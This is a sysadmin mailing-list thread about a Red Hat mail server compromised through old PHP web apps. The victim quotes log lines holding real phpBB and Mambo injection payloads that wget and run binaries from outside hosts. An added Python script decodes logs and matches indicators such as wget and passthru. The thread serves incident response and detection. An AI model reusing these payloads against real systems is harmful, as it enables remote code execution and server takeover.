Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.

I uncovered this in the apache logs:

./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is:

./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1

But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help.

David
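Peter's advice below to grep the access logs for 'wget', and the percent-encoded request David found by doing so, are the basis for this added example (my code, not from anyone in the thread): it percent-decodes each request target, including double-encoded parts, before matching indicator tokens. The log format regex, the indicator list and the sample lines with documentation-range addresses are my own assumptions.

```python
import re
from urllib.parse import unquote

# Apache combined-log line: client, ident, user, [timestamp], "METHOD target HTTP/x" ...
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')

# Tokens that rarely belong in a legitimate query string; matched against the decoded target
# only, so a crawler announcing "Wget/1.x" in its User-Agent is not flagged by accident.
INDICATORS = ("wget", "cd /tmp", "passthru", "chmod ", "/bin/sh", "system(")

# Constructed sample lines (not from the original thread); 198.51.100.x and 203.0.113.x are
# documentation ranges, not real hosts.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jan/2006:22:40:01 +0930] "GET /forum/viewtopic.php?t=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [15/Jan/2006:22:45:30 +0930] "GET /robots.txt HTTP/1.0" 200 88 "-" "Wget/1.10.2"',
    # "echo" and "passthru" are percent-encoded and the quotes double-encoded (%2527), like the thread's log line
    '203.0.113.9 - - [15/Jan/2006:22:51:53 +0930] "GET /forum/viewtopic.php?t=2'
    '&x=%65%63%68%6F%20hi%3B%20cd%20/tmp;wget%20203.0.113.9/bin.tar.gz'
    '&h=%2527.%70%61%73%73%74%68%72%75%28%24x%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0"',
]

def decode_fully(s, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2527 -> %27 -> ') are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def suspicious_requests(lines):
    """Return one record per request whose decoded target contains an indicator token."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line (e.g. error_log output)
        decoded = decode_fully(m.group("target"))
        found = [tok for tok in INDICATORS if tok in decoded.lower()]
        if found:
            hits.append({"client": m.group("client"), "ts": m.group("ts"),
                         "indicators": found, "decoded": decoded})
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['indicators']}\n    {hit['decoded']}")
```

A plain `grep wget` over the same three lines would report the harmless robots.txt fetch and miss nothing here, but it would miss a payload whose every keyword is percent-encoded; decoding first closes that gap.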

Peter Maag wrote:
Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the culprit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box.

In the future I would recommend chmod'ing the following executables to 700:
    wget
    ftp
    lynx

If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on these files, they had to have executed the script with: perl filename.pl

Check out mod_security for Apache as well.

Peter

On 2/10/06, David <[EMAIL PROTECTED]> wrote:

    Rick Macdougall wrote:
    > David wrote:
    >> *warning long email*
    >>
    >> Hi all,
    >>
    >> We have been running a Shupp toaster for about 18 months on a Redhat
    >> 9 box, and the other day it appears it was compromised by spammers. I
    >> thought if I posted a few things I found about the system drive
    >> perhaps someone might be able to help me figure out how/how to
    >> prevent this...
    >>
    >> apache   32499 32498  0 Feb08 ?        S      0:00  \_ perl /tmp/dc.txt 67.159.2
    >> apache   32503 32499  0 Feb08 ?        S      0:00      \_ /bin/bash
    >
    > Hi,
    >
    > I believe that is the xmlrpc exploit against apache/php (could be the
    > phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc).
    >
    > Upgrade your php and apache, find the xmlrpc.php in question and fix it.
    >
    > You can then use a tool like qmail-remove to clean out the queue.
    >
    > Regards,
    >
    > Rick
    >
    Thanks Rick,

    I'm running php 4.3.10 and I can't find any information about a xmlrpc
    exploit; I also can't find any entries in my logs about dc.txt. I will
    keep looking.

    Thanks,
    David.

